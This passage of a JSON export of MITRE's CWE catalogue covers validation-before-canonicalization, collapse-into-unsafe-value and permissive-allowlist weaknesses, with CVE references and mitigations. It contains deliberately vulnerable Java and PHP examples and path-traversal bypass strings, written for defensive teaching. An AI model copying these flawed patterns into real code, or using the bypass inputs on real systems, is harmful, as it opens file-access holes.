character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0433"},{"Reference":"CVE-2003-0332","Description":"Product modifies the first two letters of a filename extension after performing a security check, which allows remote attackers to bypass authentication via a filename with a .ats extension instead of a .hts extension.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0332"},{"Reference":"CVE-2002-0802","Description":"Database consumes an extra character when processing a character that cannot be converted, which could remove an escape character from the query and make the application subject to SQL injection attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0802"},{"Reference":"CVE-2000-0191","Description":"Overlaps \\"fakechild/../realchild\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0191"},{"Reference":"CVE-2004-2363","Description":"Product checks URI for \\"<\\" and other literal characters, but does it before hex decoding the URI, so \\"%3E\\" and other sequences are allowed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2363"},{"Reference":"CVE-2002-0934","Description":"Directory traversal vulnerability allows remote attackers to read or modify arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a \\"..\\" sequence.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0934"},{"Reference":"CVE-2003-0282","Description":"Directory traversal vulnerability allows attackers to overwrite arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a \\"..\\" sequence.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0282"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Early Validation Errors"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"71"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, "Escaping Metacharacters", Page 439"}}},"Notes":{"Note":{"#text":"These errors are mostly reported in path traversal vulnerabilities, but the concept applies whenever validation occurs.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, Relationships"}],"Previous_Entry_Name":{"#text":"Early Validation Errors","attr":{"@_Date":"2008-04-11"}}}},"180":{"attr":{"@_ID":"180","@_Name":"Incorrect Behavior Order: Validate Before Canonicalize","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software validates input before it is canonicalized, which prevents the software from detecting data that becomes invalid after the canonicalization step.","Extended_Description":"This can be used by an attacker to bypass the validation and launch attacks that expose weaknesses that would otherwise be prevented, such as injection.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"179","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-35"},"Intro_Text":"The following code attempts to validate a given input path by checking it against an allowlist and then return the canonical path. In this specific case, the path is considered valid if it starts with the string \\"/safe_dir/\\".","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String path = getInputPath();if (path.startsWith(\\"/safe_dir/\\")){}","xhtml:br":["",""],"xhtml:div":{"#text":"File f = new File(path);return f.getCanonicalPath();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"String path = getInputPath();File f = new File(path);if (f.getCanonicalPath().startsWith(\\"/safe_dir/\\")){}","xhtml:br":["","","","",""],"xhtml:div":{"#text":"return f.getCanonicalPath();","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["The problem with the above code is that the validation step occurs before canonicalization occurs. An attacker could provide an input path of \\"/safe_dir/../\\" that would pass the validation step. However, the canonicalization process sees the double dot as a traversal to the parent directory and hence when canonicized the path would become just \\"/\\".","To avoid this problem, validation should occur after canonicalization takes place. In this case canonicalization occurs during the initialization of the File object. The code below fixes the issue."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0433","Description":"Product allows remote attackers to view restricted files via an HTTP request containing a \\"*\\" (wildcard or asterisk) character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0433"},{"Reference":"CVE-2003-0332","Description":"Product modifies the first two letters of a filename extension after performing a security check, which allows remote attackers to bypass authentication via a filename with a .ats extension instead of a .hts extension.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0332"},{"Reference":"CVE-2002-0802","Description":"Database consumes an extra character when processing a character that cannot be converted, which could remove an escape character from the query and make the application subject to SQL injection attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0802"},{"Reference":"CVE-2000-0191","Description":"Overlaps \\"fakechild/../realchild\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0191"},{"Reference":"CVE-2004-2363","Description":"Product checks URI for \\"<\\" and other literal characters, but does it before hex decoding the URI, so \\"%3E\\" and other sequences are allowed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2363"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Validate-Before-Canonicalize"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS01-J","Entry_Name":"Normalize strings before validating them","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"IDS01-J","Entry_Name":"Normalize strings before validating them","Mapping_Fit":"Exact"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"80"}}]},"Notes":{"Note":{"#text":"This overlaps other categories.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Functional_Areas"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Validate-Before-Canonicalize","attr":{"@_Date":"2008-04-11"}}}},"181":{"attr":{"@_ID":"181","@_Name":"Incorrect Behavior Order: Validate Before Filter","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software validates data before it has been filtered, which prevents the software from detecting data that becomes invalid after the filtering step.","Extended_Description":"This can be used by an attacker to bypass the validation and launch attacks that expose weaknesses that would otherwise be prevented, such as injection.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"179","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Validate-before-cleanse"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Implementation","Architecture and Design"],"Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being filtered."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-36"},"Intro_Text":"This script creates a subdirectory within a user directory and sets the user as the owner.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function createDir($userName,$dirName){}","xhtml:div":{"#text":"$userDir = \'/users/\'. $userName;if(strpos($dirName,\'..\') !== false){}$dirName = str_replace(\'~\',\'\',$dirName);$newDir = $userDir . $dirName;mkdir($newDir, 0700);chown($newDir,$userName);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""],"xhtml:div":{"#text":"echo \'Directory name contains invalid sequence\';return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:i":"//filter out \'~\' because other scripts identify user directories by this prefix"}}},"Body_Text":"While the script attempts to screen for \'..\' sequences, an attacker can submit a directory path including \\".~.\\", which will then become \\"..\\" after the filtering step. This allows a Path Traversal (CWE-21) attack to occur."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0934","Description":"Directory traversal vulnerability allows remote attackers to read or modify arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a \\"..\\" sequence.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0934"},{"Reference":"CVE-2003-0282","Description":"Directory traversal vulnerability allows attackers to overwrite arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a \\"..\\" sequence.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0282"}]},"Functional_Areas":{"Functional_Area":"Protection Mechanism"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Validate-Before-Filter"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"80"}}]},"Notes":{"Note":{"#text":"This category is probably under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Functional_Areas, Relationships, Research_Gaps, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"}],"Previous_Entry_Name":{"#text":"Validate-before-filter","attr":{"@_Date":"2008-04-11"}}}},"182":{"attr":{"@_ID":"182","@_Name":"Collapse of Data into Unsafe Value","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software filters data in a way that causes it to be reduced or \\"collapsed\\" into an unsafe value that violates an expected security property.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"33","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"34","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"35","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-44"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."},{"Description":"Canonicalize the name to match that of the file system\'s representation of the name. This can sometimes be achieved with an available API (e.g. in Win32 the GetFullPathName function)."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0815","Description":"\\"/.////\\" in pathname collapses to absolute path.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0815"},{"Reference":"CVE-2005-3123","Description":"\\"/.//..//////././\\" is collapsed into \\"/.././\\" after \\"..\\" and \\"//\\" sequences are removed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3123"},{"Reference":"CVE-2002-0325","Description":"\\".../...//\\" collapsed to \\"...\\" due to removal of \\"./\\" in web server.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0325"},{"Reference":"CVE-2002-0784","Description":"chain: HTTP server protects against \\"..\\" but allows \\".\\" variants such as \\"////./../.../\\". If the server removes \\"/..\\" sequences, the result would collapse into an unsafe value \\"////../\\" (CWE-182).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0784"},{"Reference":"CVE-2005-2169","Description":"MFV. Regular expression intended to protect against directory traversal reduces \\".../...//\\" to \\"../\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2169"},{"Reference":"CVE-2001-1157","Description":"XSS protection mechanism strips a <script> sequence that is nested in another <script> sequence.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1157"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Collapse of Data into Unsafe Value"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS11-J","Entry_Name":"Eliminate noncharacter code points before validation"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, "Character Stripping Vulnerabilities", Page 437"}}},"Notes":{"Note":{"#text":"Overlaps regular expressions, although an implementation might not necessarily use regexp\'s.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Relationship_Notes, Relevant_Properties, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"183":{"attr":{"@_ID":"183","@_Name":"Permissive List of Allowed Inputs","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are explicitly allowed by policy because the inputs are assumed to be safe, but the list is too permissive - that is, it allows an input that is unsafe, leading to resultant weaknesses.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"434","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Allowlist / Allow List","Description":"This is used by CWE and CAPEC instead of other commonly-used terms. Its counterpart is denylist."},{"Term":"Safelist / Safe List","Description":"This is often used by security tools such as firewalls, email or web gateways, proxies, etc."},{"Term":"Whitelist / White List","Description":"This term is frequently used, but usage has been declining as organizations have started to adopt other terms."}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-12799","Description":"chain: bypass of untrusted deserialization issue (CWE-502) by using an assumed-trusted class (CWE-183)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12799"},{"Reference":"CVE-2019-10458","Description":"sandbox bypass using a method that is on an allowlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10458"},{"Reference":"CVE-2017-1000095","Description":"sandbox bypass using unsafe methods that are on an allowlist","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000095"},{"Reference":"CVE-2019-10458","Description":"CI/CD pipeline feature has unsafe elements in allowlist, allowing bypass of script restrictions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10458"},{"Reference":"CVE-2017-1000095","Description":"Default allowlist includes unsafe methods, allowing bypass of sandbox","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000095"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Permissive Whitelist"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"71"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, "Eliminating Metacharacters", Page 435"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Alternate_Terms, Description, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Alternate_Terms, Observed_Examples"}],"Previous_Entry_Name":{"#text":"Permissive Whitelist","attr":{"@_Date":"2020-02-24"}}}},"184":{"attr":{"@_ID":"184","@_Name":"Incomplete List of Disallowed Inputs","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete, leading to resultant weaknesses.","Extended_Description":"Developers often try to protect their products against malicious input by performing tests against inputs that are known to be bad, such as special characters that can invoke new commands. However, such lists often only account for the most well-known bad inputs. Attackers may be able to find other malicious inputs that were not expected by the developer, allowing them to bypass the intended protection 